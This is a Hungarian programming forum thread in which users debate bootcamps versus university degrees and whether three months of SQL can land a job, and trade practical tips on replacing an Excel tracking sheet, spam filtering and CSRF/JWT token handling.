Hirdetés
- Házimozi belépő szinten
- SSD kibeszélő
- E-book olvasók
- Nvidia GPU-k jövője - amit tudni vélünk
- Sokoldalú Thunderbolt 5 dokkoló érkezett a Cable Matters színeiben
- TCL LCD és LED TV-k
- Kormányok / autós szimulátorok topikja
- Milyen asztali (teljes vagy fél-) gépet vegyek?
- Hisense LCD és LED TV-k
- Intel Core i5 / i7 / i9 "Alder Lake-Raptor Lake/Refresh" (LGA1700)
-
PROHARDVER!
Új hozzászólás Aktív témák
-
addikt
Van más alternatíva is elkezdeni a pályát. Mi a véleményetek az egyetemet frissen végzett emberek számára kialakított "Graduation Program"-okról? (Mondjuk én kicsit másfélét végeztem...)
Ilyet számos nagy multinacionális cég szervez, kifejezetten pályakezdők betanítására. Időtartama változó, egyiknél csak néhány hónap, másiknál akár másfél év, és a lényege, hogy általában kiküldenek valamelyik külföldi telephelyére a cégnek, ahol trainingeken vesz részt a delikvens, rendesen kioktatják, aztán visszatér Budapestre és elhelyezkedik az adott pozícióra, amire betanították. Gondolom a program ideje alatt nem igazán jár fizetés. De talán pont ezért - és ez csak spekuláció - az a megérzésem, hogy az ilyen programokhoz való bekerüléshez inkább a soft skilleket nézik, az a lényeg hogy jó képességei legyenek, a többit majd megtanítják, tehát a felvételhez a megkövetelt szakmai ismeretek szintje talán alacsonyabb, mint bármilyen más junior pozíciónál, ahol már az elején dolgozni kell, fizetésért.
De ez csak egy elgondolás a részemről. Valakinek van ilyesmivel tapasztalata?
[ Szerkesztve ]
-
-
kezdosql
tag
válasz Citroware #12790 üzenetére
USA es UK gyakorlat az, hogy a megrendelonek gyors megoldas kell, es a ceg vezetoi nem szakemberek.
Ezert nem programozokat keresnek, hanem megmondjak, hogy mi a feladat, es olyat vesznek fel, aki mar csinalt olyat, es akkor tudjak, hogy korabban mennyi ideig tartott, es az az idolimit less a hatarido.
Erre epul a github es tarsai, egyfajta cv, hogy "ilyet csinaltam, ha kell hasonlo, alkalmazz" es erre startoltak ra olyan kepzo cegek, akik akarkibol kikepeznek par honap alatt olyan szakertot, aki az adott terulethez ert. Ezeket utaztatjak orszagokban egyik cegtol a masikig, amig hasonlo feladatot kell megoldani es mindenki jol jar.
Azt se erdemes elfelejteni, hogy ott nem az erettsegi, hanem a 15-16 eves korban letett GCSE-nek nevezett altalanos teszt a lenyeg, az alapjan megy tovabb az illeto es akar egyetemet is ugy vegzi el, hogy csak ket targybol kell vizsgat tennie. Rengeteg olyan diplomas van ott, akinek matematika, fizika, kemia es mas "nehez" targyakat egyaltalan nem kellett tanulnia. -
dabadab
titán
válasz #95561216 #12796 üzenetére
"3 hónap tapasztalat meg pont 3 hónappal több, mint amennyi a legtöbb programozónak van a piacon"
Ez akkor lenne igaz, ha az illető egyébként amúgy tisztában lenne a szakmával és azalatt a három hónap alatt nem az alapok megértésével lenne elfoglalva, hanem azzal, hogy a konkrétan mondjuk a BigQueryről szóló információkat beillesztené az addigi tudása kontextusába meg kísérletezne és a kísérletek eredményeit ebbe a rendszerbe tudná berakni. Ezek hiányában viszont lesz egy csomó tudásmorzsácska meg voodoo-programozás, mert emberünk már magát a problémát se érti, amit a BigQuery megoldana.
[ Szerkesztve ]
DRM is theft
-
törölt tag
7 év alatt nem láttam itthon olyan pozíciót, amihez elég lett volna pár hónap sql, pedig megfordultam több száz fős projecten is. Évtizedes tapasztalatú sql szaki alkalmazásáról is csak hallottam, hogy ismerős ismerősének projectjén volt ilyen. Szükség se nagyon volt rá, mert microservicek miatt vagy faék egyszerűségű db-k voltak, vagy nosql.
Amiben látok lehetőséget, az pl sql+bigquery, vagy egyéb data warehouse tanulmányozása pár hónapig. Ezeket még nem nagyon ismerik, ráadásul mindnek van valami nyűgje, amivel lehet napokat szopni, 3 hónap tapasztalat meg pont 3 hónappal több, mint amennyi a legtöbb programozónak van a piacon. Én lobbiznék ilyen ember felvételéért, aki helyettem végignyálazza a doksikat meg az sdk lelkivilágát.
-
disy68
aktív tag
válasz Xmodule #12787 üzenetére
Üdv, több lehetőség is van, akár az excel-t megtartva is. Csinálhatjátok azt, hogy külön excel fájlokban tároljátok az adatokat (éves/havi/akármilyen bontásban). A megjelenítés/használat úgy működne, hogy a mostani excel töltené be az adatokat (pl. időintervallum megadásával) a többi excel táblából. Így nem nőne túl nagyra egy tábla sem. A másik, hogy bevezettek egy adatbázist és azt használjátok excellel hasonlóan az előzőben felvázoltakhoz, csak a forrás más lesz.
Persze működhet a dolog Access-szel, ahogy már javasolták vagy bármilyen más programnyelven is.
Ha saját fejlesztés a cél, akkor annyi a kérdés, hogy szeretnétek-e telepíteni vagy web-es megoldás jobb lenne (böngészőből használható, nem kell telepíteni frissíteni klienseknél, stb.). Itt általában n+1 lehetőség van, a javaslat pedig az szokott lenni, hogy amihez ért az ember abban érdemes megcsinálni. Magyarul meg lehet írni az alkalmazást php, javascript, c#, java, python, ruby és még egy jó adag más nyelven is.Programozói tudás nélkül én az excel-nél maradnék, lesz ott is elég dolog aminek utána kell nézni, makrót írni, stb.
“Yeah, well, you know, that’s just, like, your opinion, man.” — The Dude
-
sztanozs
veterán
#12792 Citroghost:
Adatbázis admin kollégáim közül nem egy volt kénytelen "szakirányt váltani". Nem hogy 3 hónapnyi SQL ismerettel, de 5-10 év DBA tapasztalattal sem egyszerű elhelyezkedni, ha az embernek váltani kell és nincs mellette más, csak DB ismeret...Amerika pedig egyértelműen más: egyrészt ~30.000 informatikus hiányzik a szakmából, másrészt nem hogy támogatják, ha az ember csak egyvalamihez ért (pl DB), hanem általában nem is nézik jó szemmel, ha az ember más feladatkörbe "belekontárkodik".
[ Szerkesztve ]
JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...
-
Ispy
veterán
válasz Xmodule #12787 üzenetére
Az sql magában erre nem alkalmas, gondolom az excel mindenféle függvényeket használ a kereséshez, kell még egy felület, ami inputot fogad, azt továbbítja az sql adatbázis felé és fogadja az outputot ami az sql-ből jön és azt megjeleníti, szóval nem egy olyan triviális feladat, kell hozzá egy programozó, aki kivitelezi az egészet...
A legegyszerűbb talán ms access lenne, az eleve rá tud cuppani mondjuk egy ms sql serverre, és minimális programozással le lehet futtatni egy kereső kódot szerver oldalon, minden más ennél bonyolultabb lenne.
Egy sql express adatbázis 10 gb adatot tud max. tárolni, igaz a teljesítménye korlátozott, mert ingyenes, keress rá az access ms sql szavakra és kezdj el utánaolvasni.
Az adatokat meg az sql szerver beépített import wizardjaval be lehet tölteni egy adattáblába egy excelből mondjuk, de ez így nem lesz egyszerűbb, mint most.
[ Szerkesztve ]
"Debugging is like being the detective in a crime movie where you're also the murderer."
-
martonx
veterán
-
addikt
válasz cattus #12786 üzenetére
Egy másik topikban linkeltek nekem egy ilyet, egész egyetemi tantervnek megfelelő, otthonról ingyenesen, saját tempóban végigcsinálható útmutató, amiből tetszőleges speciális irányba mehetek.
Nekem pl ez eléggé tetszik. Azt már tudom, hogy a Core programming és a Core math kurzust kapásból átléphetem, és kapásból mehetnék a lecsóba, a CS50x képzésre, ami a harvardx ingyenes online képzése.
Vannak jó könyvek is (pl Learn Python the hard way), továbbá nagyon tetszetősnek tűnik az udemy egyes "fizetős" oktató videói, amiért nem feltétlenül kell annyit fizetni, amennyit elsőre gondolna az ember.
Én pl ilyeneken haladnék végig szívesen az elkövetkezendő hónapokban, amellett, hogy saját projekteket is el szeretnék kezdeni elkészíteni, feltenni githubra, ahol azt is nézegetném, mások hogyan csinálják ezt-azt.
[ Szerkesztve ]
-
Xmodule
őstag
Sziasztok. Eléggé ködös az elgondolásom de talán megértitek és tudtok segiteni nekem egy picit. A helyzet. A cégnél ahol dolgozom MS Dynamics NAV -ot hasznalunk az aruk raktarbol->boltba majd boltbol->raktarba vissza teresenek a követesere nyilvantartasara. amikor az aru visszajön annak van egy egyedi azonositoja ami tartalmazza az aru számát, leirását, mennyiségét. Ezt az informaciot szoktuk kimasolni a NAV bol es egy elegge bonyolult excel fájlba illesztjuk be ahol aztan egy szkenner segitsegevel ellenörizzuk a bejövö arukat. ez az excel fajl egy amolyan összesitö ami a navbol kapott adatokat olyan sorrendbe rakja hogy amikor szkennelunk akkor kiirja hogy az azonosito helyes e vagy sem es a többi adatot. ez igy most kicsit ködös gondolom. a lenyeg igazabol az hogy ez az excel fajl egyre csak nagyobb lesz idövel mivel egyre több adatot viszunk bele es emiatt lassul ugye. kerdesem igazabol az lenne hogy milyen mas alternativat lehetne hasznalni? egyaltalan nem vagyok programozo de szivesen kiprobalnam. szoval a problema adott csak a megvalositashoz lenne egy kis utmutatasra szuksegem. milyen programozasi nyelven lenne ertelme elkezdeni a problema megoldasat? az excel -t le kellene valtani valami masra. de mire? sql talan?
Azért jó mazochistának lenni, mert ha rossz, akkor jó. De ha meg jó, akkor rossz, tehát jó.
-
cattus
addikt
válasz Citroware #12785 üzenetére
Tisztában vagyok vele, elég mélyen benne vagyok. Viszont bármennyire is szomorúan tekintek a jelenlegi egyetemi képzés helyzetére, és látom, hogy hány helyen lehetne még javítani, még így is többre tartom, mint a fent említett párhónapos intenzív képzéseket. Kicsit olyan érzésem van tőlük, mint a "Kigyúrta magát 4 hét! Nézd meg hogy" felirattal operáló guglifordítóval magyarnak álcázott hirdetések. "Programozóvá válsz x hónap alatt!", szól ma a mondás, de a kétségeim ugyanúgy fennálnak ezzel szemben, mint a gyors izomnövekedést ígérő csodareceptekkel szemben.
Én a szakkollégiumnak vagyok nagyon hálás, anélkül most sokkal hátrébb lennék. És ezt nem nagyon tudja semmi helyettesíteni.
Do the thing!
-
addikt
válasz cattus #12784 üzenetére
Én az egyetemtől sem vagyok elragadtatva. Van némi rálátásom, mert egyrészt voltak közös óráink a mérnökinfósokkal, másrészt pedig nekünk is oktattak némi programozást, a gépészet mellett.
Nekem az a következtetésem, hogy az egész egyetemi rendszer elavult, nagyon régóta nem használt módszereket, eszközöket oktat, sok esetben szimplán azért, mert a 60+ éves professzor úr amikor fiatal volt, éppen azt tanulta, és azt oktatta egész életében, és már nem nyitott arra, hogy a mai igényeknek megfelelően adjon ismereteket a hallgatóknak... és ezzel csak egy példát mondtam. A számonkérési módszerek, az megintcsak egy másik probléma.... nem memorizálni kellene a dolgokat, hanem azt elsajátítani, mit hogyan találsz meg.Én egyenesen meg vagyok győződve arról, hogy az egyetem helyett otthon, az internetet használva, a legjobb kurzusokat saját magamnak szelektálva hatékonyabban lehet ismereteket szerezni, csak egy mentor kell (egy jó szakmabeli), vagy több, aki tud némi útmutatást adni, és tud segíteni, ha elakadok.
[ Szerkesztve ]
-
cattus
addikt
Felesleges a két képzésre járó embereket összehasonlítani, mivel (és ez minden ilyen vitánál előjön, direkt nem akartam leírni ezredjére is), hogy egyetemet is végezhet teljesen hozzá nem értő, és bootcampből is jöhet ki jó szakember. Arra szerettem volna rávilágítani, hogy véleményem szerint (és javítson ki bárki, ha tévedek), az két képzés között alapvető hozzáállásbeli különbség van: míg az egyetem szeretne belőled mérnököt (vagy programetervező informatikust) nevelni (több-kevesebb sikerrel), addig a bootcampek az éppen divatos igényeket igyekeznek kiszolgálni a cégek felől. Emiatt nem tartom sokra ez utóbbiakat, mert nem a hallgatók érdekeit nézik elsődlegesen (minél könnyebben tudjon domain-t váltani, legyen meg a "mérnöki szemlélete"), addig az utóbbiak a velük szerződtetett cégek érdekeit nézik elsődlegesen. Egy cikket olvastam, asszem az index csinálta a kódoló sulikról, amiben az egyik ilyen tanár elmondta, hogy amit két éve leadtak, az ma már semmit sem ér. Na ezért nem hiszek ezekben a világmegváltó csodákban, mert nem hosszú távra képzik az embereket, ami pedig az ő érdekük lenne, ha tényleg komolyan gondolják a progamozósdit, és nem csak az átlagnál magasabb kezdő fizetés kellemes illatot hozó szele csapta meg az orrukat.
Do the thing!
-
Ispy
veterán
válasz bambano #12781 üzenetére
Hát nem tudom, nálunk most vannak főiskolások a cégnél valami iskolás projekten keresztül, fizetéssel stb., de ennyi tudást szerintem egy asztalos is össze tud szedni, ha nagyon akar, de lehet, hogy nem.
Persze lehet mi vagyunk pechesek, kicsi a minta, ezt belátom.
"Debugging is like being the detective in a crime movie where you're also the murderer."
-
Ispy
veterán
válasz bandi0000 #12780 üzenetére
Én spec az esetek 95%-ban a saját magunk által megírt keretrendszert használom, ami teljesen lebutítja a programozói feladatokat, hiszen nem az a célja, hogy az ember zseniális és hatalmas kódhalmazokat írjon, hanem az, hogy ha kell, akkor 3 óra alatt összerakjon egy formot adatbázis kapcsolattal, formázva stb., tehát hatékony eszköz legyen.
Ez azzal jár, hogy ha mondjuk 1 évig hozzá sem kell nyúlnom xml fájlokhoz, akkor igen, utána kell olvasnom, hogy hogy is kell xml fájlokat kezelni, gugli.
Sokszor eszembe jut a régi könyvtárak kartoték rendszere, nem azt tudom, hogy mi van a könyvekben, azt tudom melyik könyvet hogyan tudom a leghatékonyabban megtalálni, sokszor csak arra emlékszem, hogy az adott dolgot melyik cégnél melyik projekben használtam, ilyenkor bevallom újrahasznosítom a kódokat.
Aztán ha egy kódot 3x is újra előveszek, akkor inkább kanyarítok belőle egy újabb lebutított classt és mehet a polcra a többi mellé, és megint nem fogok rá emlékezni fél év múlva hogyan és mit is csinál belül pontosan.
#mybad
-
bambano
titán
lehet, hogy nem fehér, de biztosan fekete.
"valaki végigseggelte a főiskolát/egyetemet, de a macskámat sem bíznám rá": ez simán előfordulhat, hogy nem teszi meg a szükséges erőfeszítéseket.
viszont az biztosan nem fordulhat elő, hogy maximális erőfeszítéssel tanul és 3 hónap alatt annyi tudást szedjen össze, hogy kezdő állásra jelentkezhessen. abszolút teljességgel kizárt.Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis
-
bandi0000
nagyúr
Na ez egy jó probléma amit felvetettél
Azon gondolkodtam, hogy sok cégnél van beugró feladat, pl papíron programozni, de amióta a
seggünkis kinyalja szinte az intellisense azóta szerintem nagyon senki se emlékszik 1-1 metódusra pl, hanem kikeresi mi kell és cső, + ha valamit nem tudsz 10 perc alatt kiguglizodNyilván ha valaki 1 nyelvet használ ott berögződnek talán előbb vagy utóbb, de ha kezdő akkor érdekesek ezek a tesztek
Xbox One: bandymnc
-
Ispy
veterán
válasz cattus #12778 üzenetére
Ezt azért így nem állítanám...
Szerintem ez (sem) fekete vagy fehér, lehet valaki képes 3 hónap alatt annyi tudás összeszedni, hogy elinduljon ezen a pályán, és lehet, hogy valaki végigseggelte a főiskolát/egyetemet, de a macskámat sem bíznám rá (ha lenne).
És persze az sem mindegy, hogy milyen munkára akar jelentkezni, mekkora céghez stb., egy biztos, akit ez érdekel és hajlandó ebbe energiát fektetni, az tegye meg nyugodtan, a többit az élet eldönti.
A jó probléma megoldó képesség, precizitás, logikus gondolkodás, megbízhatóság vagy kitartás nem attól függ, hogy valaki asztalos, autószerelő vagy programozó, ezek emberi tulajdonságok, én gugli nélkül már programozni sem tudnék, mert eszembe sincsen fejből megtanulni az összes libary tartalmát, de egy mintakódot gyorsan asszimilálok, aztán persze azt is gyorsan elfelejtem.
[ Szerkesztve ]
-
cattus
addikt
válasz Citroware #12775 üzenetére
Az ilyen programozó bootcampek egy valamire jók: a szerződött cégeknek olcsó, gyorsan betanítható embereket adnak, akik el tudják végezni azt a feladatot, amire megtanították őket. A frissdiplomás általában nem azért értékesebb egy cég számára, mert ott a papír a kezében, hanem mert ha eléraknak egy számára addig ismeretlen / kevésbé ismert problémát, akkor gyorsabban tudja azt megoldani, mint aki három hónap alatt megtanult összerakni egy zenelejátszót JavaScriptben. Ha valaki meg egy ilyen kurzus után nettó 1.6M JMF-et keres, az vagy olyan pro eleve, hogy nincs is szüksége ilyen bootcamp-re, vagy hazudik.
Vagy csókosnál dolgozik.Do the thing!
-
Domonkos
Ármester
válasz Citroware #12775 üzenetére
>nekem már volt néhány hónap C++ és Python.
Egyebkent nehany honapnyi C++ es Python tudassal szerinted el lehet helyezkedni valahol?
Nem piszkalodasbol; de ezek szerint ezt te tudhatnad kozulunk a legjobban.[ Szerkesztve ]
Gender of electrical connectors is defined by the pins.
-
addikt
válasz martonx #12774 üzenetére
Nekem jelenleg van más munkahelyem, nem tudnék most ezzel ennyit foglalkozni.
Esetleg április elejétől számolhatnánk, akkor hagyom ott. Mondjuk én előnnyel indulok, nekem már volt néhány hónap C++ és Python. Ami nem sok, de több, mint a semmi. És van már egy 250 soros programom. (sörlehűtés időbecslő, user inteface-szel)
[ Szerkesztve ]
-
martonx
veterán
válasz Citroware #12769 üzenetére
No, és ez az ami nettó baromság Illetve nyilván azon múlik, hogy ki honnan indul. Ha mondjuk emberünk egyébként elméleti matematikus, akkor simán el tudom képzelni, hogy 2 hónap, napi 8 órás kurzusok sorba tolásával, el tud jutni egy junior szintre.
Ha asztalos, és onnan kezd, hogy meg kellene angolul tanulni a tutorialok megértéséhez, meg bakker mi is az a százalék számítás, nem hogy halmazelmélet, akkor ez szimplán baromság, amit mond.De tessék, előtted a lehetőség, bizonyítsd be nekünk, hogy az embernek a videóban igaza van, és utána tudod csinálni. Legyünk megengedőek, hét végétől indul az óra, és 3 hónapod van először bemutatni az SQL szakértőként megkeresett első havi 6000 dollárodat.
Én kérek elnézést!
-
opr
nagyúr
válasz Citroware #12771 üzenetére
Oszinten szolva engem mar az a teny is meglep, hogy kizarolag az SQL-t ismerve (legyen az barmilyen szinten is) lehet egyaltalan allast talalni manapsag.
"Programozó vagyok. Ez azt jelenti, hogy amit leírok, megtörténik." :D “The only valid measurement of code quality is What-The-F**ks/Minute.” - Robert Martin
-
addikt
válasz Domonkos #12770 üzenetére
Ezt értem. Viszont ha kifejezetten a szóban forgó SQL-es adatelemző pozícióról van szó, akkor kérdés, hogy ha az ember 2 hónapon keresztül, napi 6 órában SQL-ezik, akkor vajon nem szerez-e konkrétan ebből több ismeretet, mint az, aki elvégezte az egyetemet, ezer más dolgot megtanult, sokkal többet, de kifejezetten SQL-ből esetleg nem. Mert pl sok más tantárgya volt, és az az egy, amelyiken az SQL-t oktatták, az nem volt ennyi óra. Vagy már nem friss emlék.
De megértem az érveitek, csak próbálom kitalálni, hogy mire alapozva készítette ezt a videót az illető, aki elmondása szerint saját maga ezt meg is csinálta és talált vele állást, 3 hónap tanulás után.
[ Szerkesztve ]
-
Domonkos
Ármester
válasz Citroware #12769 üzenetére
Sajat ismertsegi koromre alapozva en sem hiszem, hogy ennyi ido alatt akarki ertekes munkaerove kepezheti at magat. Lehet hogy erteni fogja az alap dolgokat, de tapasztalata akkor sem lesz (ertsd: kevesebb, mint egy friss diplomasnak). Aztan gondolhatod, hogy a cegek kit alkalmaznak szivesebben...
Gender of electrical connectors is defined by the pins.
-
addikt
válasz bambano #12768 üzenetére
A videóban beszélő ember nem ezt állítja. Nem azt mondja, hogy két hónap alatt helyettesíthető, vagy akárcsak megközelíthető. Csak annyit mond, hogy ha az egész szakterületnek ennek az apró szegmensére fókuszál, akkor 3 hónap alatt ebből a szűk területből meg tud szerezni annyi tudást, amivel valamilyen kifejezetten erre a tevékenységre fókuszáló egyszerű pozícióra már felvételt tud nyerni valamilyen cégnél, 70-80.000 USD évi fizetést is el tud érni, ami nem sokkal van az átlagok alatt. És eközben képezheti magát, bővítheti a tudását, amihez több év kell, hogy teljeskörű legyen.
-
bambano
titán
válasz Citroware #12766 üzenetére
amikor én egyetemre jártam, a progmat még osztott szak volt, mint azóta megint.
első három évben főiskolai végzettséget bizonyító oklevelet állított ki az egyetem, következő két évben egyetemi diplomát kaptunk. tehát két záróvizsga, két diplomamunka. erősen hasonlított a bsc/msc felosztásra, bár nem volt az.aki azt hiszi, hogy két hónap alatt informatikából megfelelő szintre képzi magát, az ezzel azt is állítja, hogy az egyetemi képzés nem ért többet két hónapnyi otthontanulásnál, vagyis az egyetemi képzés nullát ér.
ez nyilvánvaló marhaság, ez a mostani hr-es hype következménye is.
Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis
-
addikt
válasz bambano #12765 üzenetére
Itt nem arról van szó, hogy perfektül elsajátítani a nyelvet, hanem legalább egy olyan szintet elérni, amivel már felvesznek valahova.
Neki könyvelő diplomája volt, nekem pl gépészmérnöki van. Ő 3 hónap alatt ezt véghezvitte.
Mondjuk ja, gazdasági vagy mérnöki területen szerzett matematikai alapok jól jönnek pluszba egy olyanhoz képest, aki középiskola után akarna nekilátni.
A színvonal meg olyan, hogy a munkahely nélkül otthon tanulás helyett a legalja is jobb, ott legalább fizetnek is azért, hogy fejlődsz.
A másik opció, hogy továbbra is dolgozik az ember a saját korábban eltanult szakmájában, és munka mellett egy kis ideje jut arra, hogy megalapozza a váltást a programozói pályára, de így nagyon lassan lehet csak eljutni arra a szintre, másféle munka mellett.
[ Szerkesztve ]
-
bambano
titán
válasz Citroware #12764 üzenetére
pontosítsunk: egyetemi tanulmányok nélkül 2 hónap alatt nem sajátítod el még az sql-t sem, pláne az adatbáziskezelést. halmazelmélet, fonya nélkül ez nem megy.
persze nyilván beszámít a színvonal, van, akinek a trabant meg a lada granta autó, van, akinek vesék nélkül nem az.
Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis
-
addikt
Mert nem igazán lehet röviden összefoglalni ami teljesen visszaadja a mondandóját, az egészet leírva elolvasni meg semmivel sem rövidebb idő, mint megnézni a videót, de akkor csinálok most neked egy rövidítést:
Azt mondja, hogy junior szoftverfejlesztő állás megszerzéséhez 2 évet kell tanulni nulláról, egyetem nélkül, de van egy másik út is, az adatbázis szakértő, amihez elég annyi, hogy 2 hónap alatt elsajátítja az ember a SQL-t, és mellette 1 hónap alatt egy adat vizualizálót pl Tableau, azaz 3 hónap alatt, napi 6 óra tanulással elér arra a szintre, amivel az embert már felveszik egy állásra. Utána onnan majd később átugorhat a szoftverfejlesztés területre, ha közben képezi magát Java, Python és egyéb nyelvekkel, de mindezt úgy, hogy közben már van állása ahonnan fizetése is, és ott is fejlődik.
[ Szerkesztve ]
-
opr
nagyúr
válasz Citroware #12762 üzenetére
Ne haragudj, de ha lusta vagy leirni, mit mond a videoban, akkor miert varod el, hogy masok ne legyenek lustak megnezni a videot?
"Programozó vagyok. Ez azt jelenti, hogy amit leírok, megtörténik." :D “The only valid measurement of code quality is What-The-F**ks/Minute.” - Robert Martin
-
addikt
Az IT területeken jártas emberektől kérdezném, hogy az a helyzet amit a kolléga elmond ebben a videóban (USA), az ugyanúgy megállja-e a helyét Budapesten. Tehát hogy laikusként, diploma nélkül, így lehet a leggyorsabb módon beleugrani a programozás világába és állást találni.
Azt mondja, 3 hónap.[ Szerkesztve ]
-
törölt tag
válasz martonx #12704 üzenetére
Valószínűleg részterülete válogatja, de 8 év alatt egy cégnél kellett volna diploma, a többihez nem kellett. Egy nagy multi magyar leányánál interjúztattam is, 20-30 alapján hasonló idejű munkatapasztalattal nem volt érdemi különbség a diplomások és nem diplomások között. A gyorstalpaló programozóiskolák friss végzősei már más tészta.
-
martonx
veterán
válasz I02S3F #12746 üzenetére
De, hogy konstruktív is legyek, itt a legelső x86-os processzornak az egészen részletes leírása, némi példakóddal is meglepő módon a wikipédián (hiába még mindig gugli a barátunk).
Nyilván egy mai modern processzor ennél már nagyságrendekkel bonyolultabb, ugyanakkor a működésének az alapjai továbbra is ezek, szóval ha az a cél, hogy megértsd, mi miért történik egy programkód futtatása közben, akkor itt érdemes elindulnod (vagy belátni, hogy jobb ezt leszarni, és elfogadni, hogy fekete doboz, és kész ).
Én kérek elnézést!
-
martonx
veterán
válasz bambano #12754 üzenetére
Az hagyján, de hosszasan tudok beszélni a C# GC végrehajtási szintjeiről, sőt még az érték és referencia típusok közötti különbséget is el tudom mondani
Vagy mik szoktak még lenni a klasszikus hülye állásinterjús kérdések? Amikkel jól lehet szopatni, miközben a munkában 99.99% hogy nem fognak előjönniÉn kérek elnézést!
-
-
I02S3F
addikt
Sziasztok! Épp PHP-t tanulok és az a kérdés jutott az eszembe, hogy a foreach-el bejárjuk a tömb elemeit. És elképzeltem, hogy egyik elem után halad a kurzorom a másik elemre, minthacsak a most gépelt szöveg betűi között navigálnék egyik szomszédos betűről a másikra.
Az a kérdésem, hogy a számítógépen belül mi a háttere ennek a mozgásnak? Mitől van a változás a gépen belül? Leginkább a hardver oldali magyarázat érdekelne.
Amit én hozzátudok tenni, hogy a CPU-ban lévő kvarckristály ciklusos rezgése végez frissítést a gépen tárolt adatokon.
Lehet hülyeséget írok. Nem tudom. Minek olvasssak utána, ami közelebb visz a témához?
-
Tigrismacko
csendes tag
Sziasztok!
Előre jelezni szeretném, hogy minimális programozási tudásom van, az is inkább csak autodidakta módon megtanult.
Van egy webtárhelyem ahol magam szórakozására szoktam weblapokat feltelepiteni. CMS rendszrerek, többnyire. Most egy olyan problémába futottam, hogy a gépen lévő szerverre fel tudok telepíteni egy rendszert, de a webtárhelyen nem. 500-as hibát ír ki. A tarhely azt írta a kérdésemre, hogy a .htaccess fájt kell atalakitani hozzá. Ennek a tartalma számomra ismeretlen, mármint a szerkesztése. Nem tudom, nem értem a benne lévő parancsokat. Ha ezt törlöm, a telepítés elindul, de nem lesz jó a telepítés. Pár sor van benne, de hogy abban mit és hogyan kell át alakítani, nem tudom. Ebben valaki tud segíteni? Akár privátban is, ha itt ez nagyon kis iskolás téma
Előre is köszönöm
Üdv, Csaba -
HI-FI
tag
Üdv!
Ezt az algoritmust szeretném leírni valamilyen progremnyelv segítségével, de a negyedik sorban lévő for ciklussal gondom akadt. Tudna valaki esetleg segítni, hogy az hogyan lehetne megvalósítani?
-
sztanozs
veterán
ha leiratkozom akkor is jönnek ugyanazok a tartalmú mélek
A leiratkozás (főleg az ilyen intruzív küldőknél), csak azt a célt szolgálja, hogy leellenőrizzék, hogy valaki olvassa is a postafiókot - valójában ez nekik csak megerősítés, hogy jó helyre küldenek leveleketJOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...
-
Fagyi
aktív tag
Sziasztok!
Lehet, hogy nem jó helyen járok, ha mégsem ide tartozik, akkor szívesen venném hol tudnak ebben a kérdésben segíteni.
A weboldalamon (szolgáltatói, nem saját nincs hozzáférésem, azt hiszem) Roundcube levelező kiszolgálót használnak. Megtalált egy spam gyáros weboldal, igaz csak hirdetésekkel, de nekem nagyon zavaró, hogy időnként 20-30 spam reklám jön.
Hogy tudnám jól beállítani a szűrőt, hogy ez ne történjen meg. A gmailre is van szinkronizálva, de a céges méleket inkább innen szeretem kezelni.
A feladó mindig random, ha leiratkozom akkor is jönnek ugyanazok a tartalmú mélek.
??Köszönöm a választ!
Üdv
fagyi
https://logout.hu/cikk/zyxel_nas326/ Nexbox A95x + IPTV
-
wwhy
veterán
Srácok, egy kis segítséget kérek, előrebocsátva, hogy programozáshoz (html-en kívül) egyáltalán nem értek.
Adott egy sw, ami legálisan lett megvéve, X éve, de anno még a kőkorszakban készült (ha jól tudom 2005), és nem támogatja a HD/fullHD kijelzőket - névjegye szerint: képernyő: 640x480 - így azokon bolhasz@r méretben jelenik meg. Kérdésem az lenne, hogy forráskód nélkül - a fejlesztő cég/emberke/team gyakorlatilag már nem létezik - lehetséges-e át/- újraírni valahogy ezt a részét a programnak?
Egy másik furcsasága, hogy kizárólag a kijelző közepén terpeszkedik, nem lehet onnan elhúzni sehová, de ez W10 alatt másik asztalon nem olyan vészes probléma, de a felbontás viszont az; fullHD 13-as laptopon kellene használni ... Köszönöm a segítséget.[ Szerkesztve ]
ELADÓ <<Dell 7440 laptop>><<Újszerű, garis>><<i5-1345U, 16GB RAM, 256GB vagy 1TB SSD>>
-
bandi0000
nagyúr
válasz sztanozs #12734 üzenetére
Köszönöm, még1 kérdés aztán nem fárasztalak...
Tehát akkor,ha jól értem a CSRF és a JWT külön dolgokra jó
Tehát ha én azt szeretném, hogy sose jelentkezzen ki a felhasználó látszólag, akkor JWT acces és refresh token kell pl, ha lejárt az access token, akkor kér a háttérben egy új access tokent a refresh tokennel, JWT a felhasználó azonosítására kell nekem
De még kelleni fog egy CSRF token, amit pl első bejelentkezésnél megkap, és amikor pl egy törlést akar csinálni, akkor ezt visszajuttatja a szerverre, aki ellenőrzés után végrehajtja a törlést, és küld egy új CSRF tokent
Nem lehet a kettőt egyesíteni? Vagy ezt mindig ilyen (látszólag) bonyolultan oldják meg?
-
sztanozs
veterán
válasz bandi0000 #12733 üzenetére
Mindegy, hogy session-id-t használsz magában, vagy CSRF-et is külön - ha a session id nem cookie-ban megy, hanem form fieldben. Viszont ha Cookie alapú session kezelésed van, akkor kell GET/POST paraméter alapú CSRF token is.
Általánosságban viszont CSRF-védelem csak azokhoz az erőforrásokhoz kell, amelyek változtatnak szerveroldali állapoton (pl logon/logoff, konfig/erőforrás változtatás, tranzakció, create/update/delete) Kizárólag view request-ekhez nem kell CSRF token.
[ Szerkesztve ]
JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...
-
bandi0000
nagyúr
válasz sztanozs #12732 üzenetére
és van értelme a kettőt, tehát a JWT-t és a CSRF-et együtt használni? tehát a jwt menne localstorage-ba és headerbe kérésenként
A csrf mrg passz, mert a legtöbb példába együtt volt a felület a háttérkóddal
Az én esetemben egy php rest backend és angular frontend lenne, php ból csak ugye a konkrét adatokat juttatom el a klienshez json formátumban
-
sztanozs
veterán
válasz bandi0000 #12731 üzenetére
